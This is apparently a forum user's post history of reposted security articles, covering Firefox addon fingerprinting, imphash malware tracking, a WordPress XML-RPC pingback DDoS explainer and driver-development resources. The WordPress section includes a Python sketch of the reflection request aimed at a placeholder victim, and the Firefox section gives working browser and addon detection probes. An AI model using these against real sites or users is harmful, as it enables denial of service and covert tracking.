Everything posted by Nytro
-
Dirty Browser Enumeration Tricks – Using chrome:// and about:
Nytro posted a topic in Securitate web
Dirty Browser Enumeration Tricks – Using chrome:// and about: to Detect Firefox & Plugins

After playing around with some of the cool Firefox Easter eggs I had an interesting thought about the internal chrome:// resources in the Firefox web browser. In a previous post I found that I could access local Firefox resources such as style-sheets, images, and other local content in any public web page. For example, if you’re using the Firefox web browser, you know what the following image is: For everyone else, the above image is broken. This is because the image is actually a link to “about:logo”. It’s a reference to a local resource only found in Firefox flavored web browsers. When the image is viewed in Chrome, Internet Explorer, or Safari, the reference doesn’t exist and the image link is broken. Alright, how about a consolation prize – what about this image? That may be cool, but it does beg the question – can we abuse this? Of course we can!

Subverting Same Origin for Browser & Plugin Identification

With a little bit of trickery we can use these local references to:
1. Identify Firefox with 100% accuracy
2. Identify any Firefox plugins with special “chrome.manifest” settings (to be covered below)

This can be done by doing something like the following:

<img src="about:logo" onload="alert('Browser is Firefox!')" />

Simply enough, if you get a JavaScript alert – you’re using Firefox! (Interestingly enough, this doesn’t work on the Tor browser. Perhaps due to the NoScript addon?) The same trick can be used to identify some plugins as well. For example if you are using the “Resurrect Pages” plugin, you can see the following image: Using the same tactic as above, we can enumerate the install of “Resurrect Pages” via the following:

<img src="chrome://resurrect/skin/cacheicons/google.png" onload="alert('Browser has Resurrect Pages installed!')" />

So, how do we know what plugins this works for? From the Mozilla Developer Network: “Chrome resources can no longer be referenced from within <img>, <script>, or other elements contained in, or added to, content that was loaded from an untrusted source. This restriction applies to both elements defined by the untrusted source and to elements added by trusted extensions. If such references need to be explicitly allowed, set the contentaccessible flag to yes to obtain the behavior found in older versions of Firefox.” https://developer.mozilla.org/en-US/docs/Chrome_Registration

To put it short, if the plugin has a line like the following in its “chrome.manifest” file:

content packagename chrome/path/ contentaccessible=yes

Then the plugin’s resources can be included just like any other web resource. Which means if the plugin has any style-sheets, images, or JavaScript – it can be enumerated!
When I was first investigating this behavior I thought I was original, but of course others have attempted this as well: Firefox add-on detection with Javascript | WebDevWonders.com Detecting FireFox Extentions ha.ckers.org web application security lab Oh well, let’s do it on a bigger scale!

Gathering Firefox Addon Analytics

In order to get a comprehensive list of which addons had set this “contentaccessible” flag to “yes”, I scraped ~12K addons from the Firefox Addons website. Each addon XPI was parsed for its “chrome.manifest” file for the “contentaccessible=yes” flag. If the flag existed, the proper chrome URI was generated for each file in the content path. These paths were then used to construct a JavaScript scanner that works by making references to these chrome URIs and checking if they are valid via the “onload” event. The completed scanner: After taking analytics on all of these addons it was found that only a mere ~400 had the proper contentaccessible flag combined with detectable resources. By detectable resources I mean resources such as JavaScript, CSS, or images that could be embedded and detected. This means that out of all the addons, only about ~3.3% could be detected in this manner.

There are, however, other methods of detecting the presence of Firefox addons. For example, despite the Adblock Plus addon not having a contentaccessible flag, it can be detected by attempting to make a script or image reference to a blocked domain. If the reference fails to load on a file that is perfectly valid, we know it is being blocked by Adblock Plus or some other anti advertisement addon. In the same manner we could fingerprint which Adblock Plus list is being used. The detection of addons is quite quick and only takes a few seconds to complete. This is due to the fact that the references are local, so they aren’t being grabbed off a webserver but directly from the browser itself. To try the scanner out in your Firefox browser, see the following link: Firefox Plugin Detector

For other hackers or web developers, a full JSON dump of the data collected is available here (warning, big file!). This contains data on publicly accessible chrome:// URIs as well as basic information on every addon collected. I’d link to the dump of all the Firefox addon XPIs downloaded but it goes well over a gigabyte in size and I’m not sure if re-hosting addons is allowed. As a final point, being able to access this data has another advantage. If any information is leaked in the JavaScript resources such as local filesystem references, OS information, etc, this could be included and potentially could leak sensitive information. After checking many of the chrome:// resources inside Firefox itself I found that most references to the browser’s version or other information have been crudely commented out. I assume because someone else has attempted this style of enumeration before. Not to mention if the content is vulnerable to XSS, you have remote code execution due to the JavaScript running at the same level as a Firefox addon. Until next time, -mandatory

Sursa: Dirty Browser Enumeration Tricks - Using chrome:// and about: to Identify Firefox & Plugins | The Hacker Blog
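A quick aside on the XPI-parsing step described in the post above: the author only links to the finished scanner, so the following is a rough, hypothetical Python sketch of that step, not the author's actual tool. The probe markup and file handling are illustrative assumptions, and jar: packaging as well as skin/locale registrations are ignored for simplicity.

import sys
import zipfile

def accessible_uris(xpi_path):
    # Return chrome:// URIs that a content-accessible addon exposes to web pages.
    uris = []
    xpi = zipfile.ZipFile(xpi_path)
    if "chrome.manifest" not in xpi.namelist():
        return uris
    manifest = xpi.read("chrome.manifest").decode("utf-8", "replace")
    for line in manifest.splitlines():
        parts = line.split()
        # Expected form: content <package> <path/> contentaccessible=yes
        if len(parts) >= 4 and parts[0] == "content" and "contentaccessible=yes" in parts[3:]:
            package, base = parts[1], parts[2]
            for name in xpi.namelist():
                if name.startswith(base) and not name.endswith("/"):
                    uris.append("chrome://%s/content/%s" % (package, name[len(base):]))
    return uris

if __name__ == "__main__":
    for uri in accessible_uris(sys.argv[1]):
        # each URI becomes an onload probe, like the <img> examples in the post
        print('<img src="%s" onload="alert(\'addon detected\')" style="display:none">' % uri)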
UCLA, Cisco & more join forces to replace TCP/IP Named Data Networking Consortium makes its debut in LA By Bob Brown Sep 4, 2014 12:05 PM Big name academic and vendor organizations have unveiled a consortium this week that's pushing Named Data Networking (NDN), an emerging Internet architecture designed to better accommodate data and application access in an increasingly mobile world. The Named Data Networking Consortium members, which include universities such as UCLA and China's Tsinghua University as well as vendors such as Cisco and VeriSign, are meeting this week at a two-day workshop at UCLA to discuss NDN's promise for scientific research. Big data, eHealth and climate research are among the application areas on the table. The NDN effort has been backed in large part by the National Science Foundation, which has put more than $13.5 million into it since 2010. Since that time, participating organizations have somewhat quietly been working on new protocols and specifications, including a new packet format, that have been put through their paces in a testbed that spans from the United States to Asia. Their aim is to put forth an Internet architecture that's more secure, able to support more bandwidth and friendlier to app developers. Cryptographic authentication, flow balance and adaptive routing/forwarding are among the key underlying principles. UCLA has been particularly involved in the NDN effort, and the consortium has been organized by researchers from the UCLA Henry Samueli School of Engineering and Applied Science. Interestingly, among those involved is Jeff Burke, Assistant Dean for Technology and Innovation at the UCLA School of Theater, Film and Television, emphasizing the interdisciplinary approach being taken with NDN. Co-leaders of the project are Lixia Zhang, UCLA’s Jonathan B. Postel Chair in Computer Science, and Van Jacobson, an Internet Hall of Famer and adjunct professor at UCLA. NDN has its roots in content-centric networking, a concept that Jacobson started at Xerox PARC. Other participants are in charge of various aspects of the project: Washington University in St. Louis, for instance, is spearheading scalable NDN forwarding technologies and managing the global testbed. It's no surprise to see Cisco getting into NDN early either (it costs $25K for commercial entities to join, though is free for certain academic institutions). David Oran, a Cisco Fellow and VoIP expert, said in a statement that the consortium "will help evolve NDN by establishing a multifaceted community of academics, industry and users. We expect this consortium to be a major help in advancing the design, producing open-source software, and fostering standardization and adoption of the technology.” Sursa: Cisco, UCLA & more launch Named Data Networking Consortium
-
Tracking Malware with Import Hashing

By Mandiant on January 23, 2014

Tracking threat groups over time is an important tool to help defenders hunt for evil on networks and conduct effective incident response. Knowing how certain groups operate makes for an efficient investigation and assists in easily identifying threat actor activity. At Mandiant, we utilize several methods to help identify and correlate threat group activity. A critical piece of our work involves tracking various operational items such as attacker infrastructure and email addresses. In addition, we track the specific backdoors each threat group utilizes – one of the key ways to follow a group’s activities over time. For example, some groups may favor the SOGU backdoor, while others use HOMEUNIX.

One unique way that Mandiant tracks specific threat groups’ backdoors is to track portable executable (PE) imports. Imports are the functions that a piece of software (in this case, the backdoor) calls from other files (typically various DLLs that provide functionality to the Windows operating system). To track these imports, Mandiant creates a hash based on library/API names and their specific order within the executable. We refer to this convention as an “imphash” (for “import hash”). Because of the way a PE’s import table is generated (and therefore how its imphash is calculated), we can use the imphash value to identify related malware samples. We can also use it to search for new, similar samples that the same threat group may have created and used. Though Mandiant has been leveraging this technique for well over a year internally, we aren’t the first to publicly discuss this.

An imphash is a powerful way to identify related malware because the value itself should be relatively unique. This is because the compiler’s linker generates and builds the Import Address Table (IAT) based on the specific order of functions within the source file. Take the following example source code:

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <wininet.h>

#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "wininet.lib")

int makeMutexA()
{
    CreateMutexA(NULL, FALSE, "TestMutex");
    return 0;
}

int makeMutexW()
{
    CreateMutexW(NULL, FALSE, L"TestMutex");
    return 0;
}

int makeUserAgent()
{
    HANDLE hInet = 0, hConn = 0;
    char buf[sizeof(struct hostent)] = {0};
    hInet = InternetOpenA("User-Agent: (Windows; 5.1)", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
    hConn = InternetConnectA(hInet, "www.google.com", 443, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
    WSAAsyncGetHostByName(NULL, 3, "www.yahoo.com", buf, sizeof(struct hostent));
    return 0;
}

int main(int argc, char *argv[])
{
    makeMutexA();
    makeMutexW();
    makeUserAgent();
    return 0;
}

When that source file is compiled, the resulting import table looks as follows:

ws2_32.dll
  ws2_32.dll.WSAAsyncGetHostByName
wininet.dll
  wininet.dll.InternetOpenA
  wininet.dll.InternetConnectA
kernel32.dll
  kernel32.dll.InterlockedIncrement
  kernel32.dll.IsProcessorFeaturePresent
  kernel32.dll.GetStringTypeW
  kernel32.dll.MultiByteToWideChar
  kernel32.dll.LCMapStringW
  kernel32.dll.CreateMutexA
  kernel32.dll.CreateMutexW
  kernel32.dll.GetCommandLineA
  kernel32.dll.HeapSetInformation
  kernel32.dll.TerminateProcess

Imphash: 0c6803c4e922103c4dca5963aad36ddf

We abbreviated the table to save space, but the red/bolded APIs are the ones referenced in the source code. Note the order in which they appear in the table, and compare that to the order in which they appear in the source file.
If an author were to change the order of the functions and/or the order of the API calls in the source code, this would in turn affect the compiled import table. Take the previous example, modified:

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <wininet.h>

#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "wininet.lib")

int makeMutexW()
{
    CreateMutexW(NULL, FALSE, L"TestMutex");
    return 0;
}

int makeMutexA()
{
    CreateMutexA(NULL, FALSE, "TestMutex");
    return 0;
}

int makeUserAgent()
{
    HANDLE hInet = 0, hConn = 0;
    char buf[sizeof(struct hostent)] = {0};
    hConn = InternetConnectA(hInet, "www.google.com", 443, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
    hInet = InternetOpenA("User-Agent: (Windows; 5.1)", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
    WSAAsyncGetHostByName(NULL, 3, "www.yahoo.com", buf, sizeof(struct hostent));
    return 0;
}

int main(int argc, char *argv[])
{
    makeMutexA();
    makeMutexW();
    makeUserAgent();
    return 0;
}

In this example, we have reversed the order of makeMutexW and makeMutexA, and of InternetConnectA and InternetOpenA. (Note that this would be an invalid sequence of API calls, but we use it here to illustrate the point.) Below is the import table generated from this modified source code (again abbreviated); note the changes when compared to the original IAT, above, as well as the different imphash value:

ws2_32.dll
  ws2_32.dll.WSAAsyncGetHostByName
wininet.dll
  wininet.dll.InternetConnectA
  wininet.dll.InternetOpenA
kernel32.dll
  kernel32.dll.InterlockedIncrement
  kernel32.dll.IsProcessorFeaturePresent
  kernel32.dll.GetStringTypeW
  kernel32.dll.MultiByteToWideChar
  kernel32.dll.LCMapStringW
  kernel32.dll.CreateMutexW
  kernel32.dll.CreateMutexA
  kernel32.dll.GetCommandLineA
  kernel32.dll.HeapSetInformation
  kernel32.dll.TerminateProcess

Imphash: b8bb385806b89680e13fc0cf24f4431e

The final example shows how the ordering of included files at compile time will affect the resulting IAT (and thus the resulting imphash value).
We’ll expand on our original example by adding files imphash1.c and imphash2.c, to be included with our original source file imphash.c:

-- imphash1.c --

int makeNamedPipeA()
{
    HANDLE ph = CreateNamedPipeA("\\\\.\\pipe\\test_pipe", PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE, 1, 128, 64, 200, NULL);
    return 0;
}

-- imphash2.c --

int makeNamedPipeW()
{
    HANDLE ph2 = CreateNamedPipeW(L"\\\\.\\pipe\\test_pipeW", PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE, 1, 128, 64, 200, NULL);
    return 0;
}

-- imphash.c --

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <wininet.h>
#include "imphash1.h"
#include "imphash2.h"

#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "wininet.lib")

int makeMutexW()
{
    CreateMutexW(NULL, FALSE, L"TestMutex");
    return 0;
}

int makeMutexA()
{
    CreateMutexA(NULL, FALSE, "TestMutex");
    return 0;
}

int makeUserAgent()
{
    HANDLE hInet = 0, hConn = 0;
    char buf[sizeof(struct hostent)] = {0};
    hConn = InternetConnectA(hInet, "www.google.com", 443, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
    hInet = InternetOpenA("User-Agent: (Windows; 5.1)", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
    WSAAsyncGetHostByName(NULL, 3, "www.yahoo.com", buf, sizeof(struct hostent));
    return 0;
}

int main(int argc, char *argv[])
{
    makeMutexA();
    makeMutexW();
    makeUserAgent();
    makeNamedPipeA();
    makeNamedPipeW();
    return 0;
}

Using the following command to build the EXE:

cl imphash.c imphash1.c imphash2.c /W3 /WX /link

The resulting IAT is:

ws2_32.dll
  ws2_32.dll.WSAAsyncGetHostByName
wininet.dll
  wininet.dll.InternetConnectA
  wininet.dll.InternetOpenA
kernel32.dll
  kernel32.dll.TlsFree
  kernel32.dll.IsProcessorFeaturePresent
  kernel32.dll.GetStringTypeW
  kernel32.dll.MultiByteToWideChar
  kernel32.dll.LCMapStringW
  kernel32.dll.CreateMutexW
  kernel32.dll.CreateMutexA
  kernel32.dll.CreateNamedPipeA
  kernel32.dll.CreateNamedPipeW
  kernel32.dll.GetCommandLineA
  kernel32.dll.HeapSetInformation
  kernel32.dll.TerminateProcess

Imphash: 9129bdbc18cfd1aba498c94e809567d5

Changing the order of includes for imphash1.h and imphash2.h within the source file imphash.c will have no effect on the ordering of the IAT. However, changing the order of the files on the command line and recompiling will affect the IAT; note the re-ordering of CreateNamedPipeW and CreateNamedPipeA:

cl imphash.c imphash2.c imphash1.c /W3 /WX /link

ws2_32.dll
  ws2_32.dll.WSAAsyncGetHostByName
wininet.dll
  wininet.dll.InternetConnectA
  wininet.dll.InternetOpenA
kernel32.dll
  kernel32.dll.TlsFree
  kernel32.dll.IsProcessorFeaturePresent
  kernel32.dll.GetStringTypeW
  kernel32.dll.MultiByteToWideChar
  kernel32.dll.LCMapStringW
  kernel32.dll.CreateMutexW
  kernel32.dll.CreateMutexA
  kernel32.dll.CreateNamedPipeW
  kernel32.dll.CreateNamedPipeA
  kernel32.dll.GetCommandLineA
  kernel32.dll.HeapSetInformation
  kernel32.dll.TerminateProcess

Imphash: c259e28326b63577c31ee2c01b25d3fa

These examples show that both the ordering of functions within the original source code – as well as the ordering of source files at compile time – will affect the resulting IAT, and therefore the resulting imphash value. Because the source code is not organized the same way, two different binaries with exactly the same imports are highly likely to have different import hashes. Conversely, if two files have the same imphash value, they have the same IAT, which implies that the files were compiled from the same source code, and in the same manner.
For packed samples, simple tools or utilities (with few imports and, based on their simplicity, likely compiled in the same way), the imphash value may not be unique enough to be useful for attribution. In other words, it may be possible for two different threat actors to independently generate tools with the same imphash based on those factors. However, for more complex and/or custom tools (like backdoors), where there are a sufficient number of imports present, the imphash should be relatively unique, and can therefore be used to identify code families that are structurally similar. While files with the same imphash are not guaranteed to originate from the same threat group (it’s possible, for example, for the files to have been generated by a common builder that is shared among groups) the files can at least be reasonably assumed to have a common origin and may eventually be attributable to a single threat group with additional corroborating information. Employing this method has given us great success for verifying attacker backdoors over a period of time and demonstrating relationships between backdoors and their associated threat groups.

Mandiant has submitted a patch that enables the calculation of the imphash value for a given PE to Ero Carrera’s pefile (pefile - pefile is a Python module to read and work with PE (Portable Executable) files - Google Project Hosting). Example code:

import sys
import pefile

pe = pefile.PE(sys.argv[1])
print "Import Hash: %s" % pe.get_imphash()

Mandiant uses an imphash convention that requires that the ordinals for a given import be mapped to a specific function. We’ve added a lookup for a couple of DLLs that export functions commonly looked up by ordinal to pefile. Mandiant’s imphash convention requires the following:

- Resolving ordinals to function names when they appear
- Converting both DLL names and function names to all lowercase
- Removing the file extensions from imported module names
- Building and storing the lowercased string dllname.functionname in an ordered list
- Generating the MD5 hash of the ordered list

This convention is implemented in pefile.py version 1.2.10-139 starting at line 3618.

If imphash values serve as relatively unique identifiers for malware families (and potentially for specific threat groups), won’t discussing this technique alert attackers and cause them to change their methods? Attackers would need to modify source code (in a way that did not affect the functionality of the malware itself) or change the file order at compile time (assuming the source code is spread across multiple files). While attackers could write tools to modify the imphash, we don’t expect many attackers to care enough to do this. We believe it is important to add imphash to the lexicon as a way to discuss malware samples at a higher level and to exchange information about attackers and threat groups. For example, incident responders can use imphash values to discuss malware without specifically disclosing which exact sample (specific MD5) is being discussed. Consider a scenario where an attacker compiles 30 variants of its backdoor with different C2 locations and campaign IDs and deploys them to various companies. If a blog post comes out stating that a specific MD5 was identified as part of a campaign, then based on that MD5 the attacker immediately knows what infrastructure (such as C2 domains or associated IP addresses) is at stake and which campaign may be in jeopardy.
However, if the malware was identified just by its imphash value, it is possible that the imphash is shared across all 30 of the attacker’s variants. The malware is still identifiable by and can be discussed within the security community, but the attacker doesn’t know which specific samples have been identified or which parts of their infrastructure are in jeopardy. To demonstrate the effectiveness of this analysis method, we’ve decided to share the imphash values of a few malware families from the Mandiant APT1 report:

Family Name    Import Hash                        Total Imports  Number of matched Samples
GREENCAT       2c26ec4a570a502ed3e8484295581989   74             23
GREENCAT       b722c33458882a1ab65a13e99efe357e   74             18
GREENCAT       2d24325daea16e770eb82fa6774d70f1   113            13
GREENCAT       0d72b49ed68430225595cc1efb43ced9   100            13
STARSYPOUND    959711e93a68941639fd8b7fba3ca28f   62             31
COOKIEBAG      4cec0085b43f40b4743dc218c585f2ec   79             10
NEWSREELS      3b10d6b16f135c366fc8e88cba49bc6c   77             41
NEWSREELS      4f0aca83dfe82b02bbecce448ce8be00   80             10
TABMSGSQL      ee22b62aa3a63b7c17316d219d555891   102            9
WEBC2          a1a42f57ff30983efda08b68fedd3cfc   63             25
WEBC2          7276a74b59de5761801b35c672c9ccb4   52             13

We calculated the above malware families and corresponding imphash values over the set of malware from the Mandiant APT1 report released in February 2013. Using the imphash method described above, we calculated imphash values over all the samples, and then counted the total number of samples that matched on each imphash. Using 356 total samples from the report, we were able to identify 11 imphash values that provided significant coverage of their respective families. Pivoting from these imphash values, we were able to identify additional malware samples that further analysis showed were part of the same malware families and attributable to the same threat group.

Imphash analysis, like any other method, has its limitations and should not be considered a single point of success. Just because two binaries have the same imphash value does not mean they belong to the same threat group, or even that they are part of the same malware family (though there is an increased likelihood that this is the case). Imphash analysis is a low-cost, efficient and valuable way to triage potential malware samples and expand discovery by identifying “interesting” samples that merit further analysis. The imphash value gives analysts another pivot point when conducting discovery on threat groups and their tools. Employing this method can also yield results in tracking and verifying attacker backdoors over time, and it can assist in exposing relationships between backdoors and threat groups. Happy Hunting!

Sursa: https://www.mandiant.com/blog/tracking-malware-import-hashing/
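To make the convention listed in the article above concrete, here is a simplified, hypothetical Python sketch of the imphash calculation computed from a list of (DLL, function) pairs. It omits the ordinal-to-name lookup step and is only meant to illustrate the string-building and hashing the article describes, not to replace pefile's get_imphash().

import hashlib

def imphash(imports):
    parts = []
    for dll, func in imports:              # order matters: keep the IAT order
        dll = dll.lower()
        for ext in (".dll", ".ocx", ".sys"):
            if dll.endswith(ext):
                dll = dll[:-len(ext)]      # strip the module extension
        parts.append("%s.%s" % (dll, func.lower()))
    return hashlib.md5(",".join(parts).encode()).hexdigest()

# toy input in IAT order; real usage would walk a PE's import table (e.g. with pefile)
print(imphash([("ws2_32.dll", "WSAAsyncGetHostByName"),
               ("wininet.dll", "InternetOpenA"),
               ("wininet.dll", "InternetConnectA")]))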
-
Security issues in WordPress XML-RPC DDoS Explained

G_Victor | September 4, 2014

A number of months ago a DDoS attack against a website used a functionality present in all WordPress sites since 2005 as an amplification vector. According to one report more than 162,000 WordPress sites sent requests to the target.

What is this DDoS? WordPress has a feature that can send requests to another WordPress site. This function has been abused for several years and just a few months ago a DDoS attack was mounted again using the XML-RPC feature to amplify the Pingbacks to an unsuspecting target.

WordPress Prevalence

WordPress is everywhere. About 22% of all sites on the Internet are WordPress sites according to Akamai’s State of the Internet Q1 2014 Report. It powers sites small to large.

What is it? WordPress and XML-RPC

WordPress is a Content Management System for blogging using plugin architecture and templates. XML-RPC is a specification explaining how a HTTP-POST request and XML as the encoding allows software running on different operating systems, in different environments to make procedure calls over the Internet. This feature has been available in WordPress since version 3.5. An administrator can manage almost any aspect of the WordPress installation from any application that implements XML-RPC such as a mobile device. Users, posts, pages or tags can be created, modified and deleted by administrators.

How is it used? For Good.

According to the specification these are the minimal requirements to receive a list of methods WordPress supports (a system.listMethods call; see the sketch after this post). A list that uses the XML-RPC WordPress API can be found here: XML-RPC WordPress API « WordPress Codex

The Attack. What Is Pingback And How Does It Work?

One such method is pingback.ping, which is a feature that links one post from one site, to another post in another site. Another way to put it is that SiteA is notified that SiteB has linked back to it. The advantage of this is that SiteA increases its credibility by most search engines' standards and SiteB cites authorship.

How Can It Be Abused? DDoS Attack?

Even though this “bug” was documented in 2007 (https://core.trac.wordpress.org/ticket/4137), and WordPress has attempted to reduce the vulnerability of the attack, in March 2014 more than 160,000 WordPress sites used this amplification technique to perform a DDoS attack against a single site. All that was necessary was the source and target URI.

The Taxonomy Of The Attack

To craft the attack simply POST a pingback.ping request (see the sketch after this post). With this call the Target receives a GET request to the non-existent page forcing a full page reload and taking away resources needed for legitimate users. If many WordPress sites all point to the same site, the Target will experience a DDoS. The Source can be any URL.

Defend Yourselves

A WordPress site owner can defend against being used as a pivot point in launching a DDoS by upgrading to the latest WordPress, either from the Dashboard or by downloading it here: https://wordpress.org/latest.zip

About HP Fortify on Demand

HP Fortify on Demand is a cloud-based application security testing solution. We perform multiple types of manual and automated application security testing, including web assessments, mobile application security assessments, thick client testing, and ERP testing, etc. We do it both statically and dynamically, both in the cloud and on premise.

Sursa: Security issues in WordPress XML-RPC DDoS Explaine... - HP Enterprise Business Community
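The request examples from the original post did not survive the copy above, so the following is a hedged Python sketch of what the two XML-RPC calls could look like, based on the documented WordPress XML-RPC API (system.listMethods and pingback.ping). All URLs are placeholders. In the commonly described variant of the reflection attack, the URL to be flooded (with a random query string to defeat caching) goes in the first (source) parameter, since that is the URL the receiving blog fetches to verify the pingback, while the second (target) parameter points at an existing post on the reflecting blog.

# Hypothetical sketch of the two XML-RPC calls discussed above; URLs are placeholders.
import requests  # any HTTP client would do; assumed available

XMLRPC = "http://some-wordpress-blog.example/xmlrpc.php"   # the reflecting blog

LIST_METHODS = (
    '<?xml version="1.0"?>'
    "<methodCall><methodName>system.listMethods</methodName>"
    "<params></params></methodCall>"
)

PINGBACK = (
    '<?xml version="1.0"?>'
    "<methodCall><methodName>pingback.ping</methodName><params>"
    "<param><value><string>http://flood-victim.example/?%d</string></value></param>"              # sourceURI: fetched by the blog
    "<param><value><string>http://some-wordpress-blog.example/a-real-post/</string></value></param>"  # targetURI: existing post
    "</params></methodCall>"
)

print(requests.post(XMLRPC, data=LIST_METHODS).text)    # enumerate supported methods
print(requests.post(XMLRPC, data=PINGBACK % 12345).text)  # random query string defeats caching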
-
I've changed the forum organization a bit to highlight the tutorials. I think it's quite visible now. Maybe this way they will catch your attention more.
-
You pussies.
-
Starting today, storing personal data is no longer permitted
Nytro replied to dicksi's topic in Stiri securitate
Fuck the Garda. -
-
Device Driver Development for Beginners - Reloaded

by Evilcry » Mon Oct 04, 2010 8:14 am

Hi,

This is just a little starter for people interested in starting Kernel-Mode Development. While following a good thread on the UIC forum, opened by a beginner who wanted to know how to start with Device Driver Development, I remembered that a long time ago I published a similar blog post on that subject. Now I'm going to Reload and Expand it.

Development Tools

1. WDK/DDK - this is the proper Driver Development SDK given by Microsoft, latest edition can be downloaded How to Get the WDK
2. Visual Studio 2008/2010 - you can also develop without VS, but I always prefer all the Comforts given by such an advanced IDE, especially in presence of complex device drivers.
3. DDKWizard - DDKWizard is a so-called project creation wizard (for VisualStudio) that allows you to create projects that use the DDKBUILD scripts from OSR (also available in the download section from this site). The wizard will give you several options to configure your project prior to the creation. You can download it Welcome to the DDKWizard homepage
4. VisualAssist - (Optional Tool) Visual Assist X provides productivity enhancements that help you read, write, navigate and refactor code with blazing speed in all Microsoft IDEs. You can Try/Buy it Visual Assist - a Visual Studio extension by Whole Tomato Software
5. VisualDDK - Develop and Debug drivers directly from VS, enjoy debugging your driver directly from Visual Studio, speeding up debugging ~18x for VMWare and ~48x for VirtualBox. Download and Step by Step Quick Start Guide VisualDDK - Quickstart
6. Virtual Machine - You need a Virtual Machine to perform efficient Driver Debugging, best options are VMWare or VirtualBox.

Building a Driver Development Environment

As you can see, a good comfortable Driver Development station is composed of a good number of components, so we need an installation order.

1. Install your IDE - VisualStudio2008 or VisualStudio2010
2. Install the WDK package
3. Install DDKWizard
4. Download and place ( usually into C:\WinDDK ) ddkbuild.cmd
5. By following the DDKWizard pdf you will be guided to add a new Environment Variable directly related to the OS version on which you are developing, and successively add a reference to ddkbuild.cmd in the VS IDE. The DDKWizard Manual is very well written.
6. After finishing the DDKWizard integration you can test whether your environment is correctly installed by compiling your first driver. The steps are easy: open VS and select the DDKWizard template (not EmptyDriver); you will see the skeleton of a Driver. All you have to do is Build Solution and verify that no compiling errors occur - if so, your station is correctly installed.
7. Install VirtualMachine
8. Integrate the debugging help of VisualDDK by following the step by step quick start guide
9. Install Visual Assist (this can be done at any moment after VS Installation)

Additional Tools

* DeviceTree - This utility has two views: (a) one view that will show you the entire PnP enumeration tree of device objects, including relationships among objects and all the device's reported PnP characteristics, and (b) a second view that shows you the device objects created, sorted by driver name. There is nothing like this utility available anywhere else. Download it Downloads:DeviceTree
* IrpTracker - IrpTracker allows you to monitor all I/O request packets (IRPs) on a system without the use of any filter drivers and with no references to any device objects, leaving the PnP system entirely undisturbed.
In addition to being able to see the path the IRP takes down the driver stack and its ultimate completion status, a detailed view is available that allows you to see the entire contents of the static portion of the IRP and an interpreted view of the current and previous stack locations. Download it Downloads:IrpTracker
* DebugMon - Displays DbgPrint messages generated by any driver in the system (or the OS itself) in the application window. Can be used either in local mode or can send the DbgPrint messages to another system via TCP/IP. Download it Downloads:DebugMon
* DriverLoader - This GUI-based tool will make all the appropriate registry entries for your driver, and even allow you to start your driver without rebooting. It's even got a help file, for goodness sakes! If you write drivers, this is another one of those utilities that's a must have for your tool chest. x86 architecture. Download it Downloads:Driver Loader

Now you have a fully working Develop and Debug Station. As you should imagine, dealing with driver development implies working at Kernel Mode, a pretty challenging, delicate and complex task. A badly written driver leads to OS crashes and/or dangerous bugs; just think about a driver used in mission-critical applications like surgery, where a bug or a crash could lead to extremely big dangers. The driver needs to be:

* Bug Free
* Fault Tolerant
* Ready to Endure all Stress Situations

This can only be done by a driver coder with a large knowledge of the following fields:

* Hardware Architecture
* Operating System Architecture
* Kernel and User Mode Architecture
* Rock Solid C language knowledge
* Debugging Ability

Here I'm going to enumerate the Documentation/Books/Etc. necessary to achieve a *good and solid* background and advanced knowledge about driver coding.

Microsoft WDK Page: Windows 8.1: Download kits and tools

It will give you information about:
1. WDM ( Windows Driver Model)
2. WDF (Windows Driver Foundation)
3. IFS Kit (Installable FileSystem Kit)
4. Driver Debugging
5. Driver Stress Testing ( DriverVerifier tool )

PC Fundamentals: Windows Hardware Design Articles (Windows Drivers)
Device Fundamentals: Windows Hardware Design Articles (Windows Drivers)

This will give you a broad view of what developing a driver means, which components are touched and which aspects you need to know. It's also obviously necessary to have a Reference for the kernel mode Functions and Mechanisms involved; the first and best resource is always MSDN, here is the starter link to follow MSDN->DDK http://msdn.microsoft.com/en-us/library ...
85%29.aspx

How to start Learning

As pointed out in the previous blog post, one of the best starting points, which will give you an on-the-fly view of development topics, is the Toby Opferman set of articles: Driver Development Part 1: Introduction to Drivers Driver Development Part 1: Introduction to Drivers - CodeProject Driver Development Part 2: Introduction to Implementing IOCTLs Driver Development Part 2: Introduction to Implementing IOCTLs - CodeProject Driver Development Part 3: Introduction to driver contexts Driver Development Part 3: Introduction to driver contexts - CodeProject Driver Development Part 4: Introduction to device stacks Driver Development Part 4: Introduction to device stacks - CodeProject Driver Development Part 5: Introduction to the Transport Device Interface Driver Development Part 5: Introduction to the Transport Device Interface - CodeProject Driver Development Part 6: Introduction to Display Drivers Driver Development Part 6: Introduction to Display Drivers - CodeProject

It's really important to emphasize Memory Management at Kernel Mode; the best starting points for these aspects are the tutorials written by four-f: http://www.freewebs.com/four-f/ Handling IRPs: What Every Driver Writer Needs to Know http://download.microsoft.com/download/ ... a/IRPs.doc

Book Resources

Tutorials are a great starting point, but a solid understanding is given by a set of 'abstracts', hence the necessity of a good Book Collection: Windows NT Device Driver Development (OSR Classic Reprints) http://www.amazon.com/Windows-Device-De ... 242&sr=8-2 Windows®-Internals-Including-Windows-PRO-Developer http://www.amazon.com/Windows%C2%AE-Int ... 160&sr=8-1 The Windows 2000 device driver book: a guide for programmers http://www.amazon.com/Windows-2000-Devi ... 0130204315 Windows NT/2000 Native API Reference http://www.amazon.com/Windows-2000-Nati ... 201&sr=8-1 Undocumented Windows 2000 Secrets Undocumented Windows 2000 Secrets Developing Drivers with WDF Developing Drivers with the Windows Driver Foundation: Reference Book (Windows Drivers) Windows NT File System Internals, A Developer's Guide Windows NT File System Internals - O'Reilly Media

Web Resources

